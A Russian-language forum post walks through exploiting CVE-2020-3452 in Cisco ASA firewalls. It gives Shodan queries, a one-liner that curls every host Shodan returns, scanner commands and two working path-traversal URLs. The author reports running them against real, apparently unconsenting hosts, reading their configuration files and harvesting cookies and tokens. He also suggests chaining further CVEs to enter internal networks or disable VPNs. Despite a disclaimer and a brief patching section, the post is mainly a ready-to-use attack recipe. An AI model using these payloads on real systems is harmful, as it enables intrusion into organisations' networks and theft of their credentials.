Приветствую Друзей,Уважаемых Форумчан и Читателей Форума.
Сегодня поговорим немного о нашумевшей уязвимости в Cisco
Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.
Эксперт из Positive Technologies не впервые находит опасные уязвимости.
Данная уязвимость касается межсетевого экрана Cisco ASA.
И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.
Компания Cisco срочно выпустила патч,но как всегда не все читают новости.
И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.
Администрация Форума и автор обзора напоминают о соблюдении законодательства.
Запрещено применение рассматриваемых методик атак в незаконных целях.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Для нахождения уязвимых целей воспользуемся поисковиком shodan.
Интерес представляют следующие версии:
Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14
Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0
Запросы для поисковика:
+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+
Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.
И выполнить поиск из терминала:
Код:
Код:
# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k "https://$host/+CSCOT+/translation-tab..." ; done
Проверка на уязвимость CVE-2020-3452
Очень удобным оказался для этого сканер от PR3R00T из Англии.
Прилагается файл urls.txt ,который чистим и заполняем списком своих целей
Формат заполнения: https://IP-цели,либо https:// сайт и домен
Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:
Код:
Код:
# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt
Вот нам сканер указывает на непропатченные машины.
Эксплуатация
Работать будем с Burpsuite,но может кому пригодиться и exploit
Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.
Впрочем,аналогично может обработать целый список хостов.
В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :
Код:
Код:
https:///+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https:///+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
Запрос при атаке в дальнейшем меняется и вместо portal_inc.lua подставляется:
Таким образом,прочитываем файлы,в которых можно найти конфиденциальную информацию.
Здесь,к примеру,найдены cookie ,token и прочее:
Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259
Она позволяет ввалиться во внутреннюю сеть атакуемой организации.
А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.
Далеко так заходить конечно не станем.
У другой цели была обнаружена вот такая страница авторизации.
И результат атаки:
Здесь без комментариев:
Просматриваем useralert:
Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:
Защита
Защитное программное обеспечение от данной уязвимости с описанием здесь
Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.
Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.
Тестируемые ресурсы живы и невридимы,им не причинено ущерба.
Благодарю всех за внимание и до новых встреч.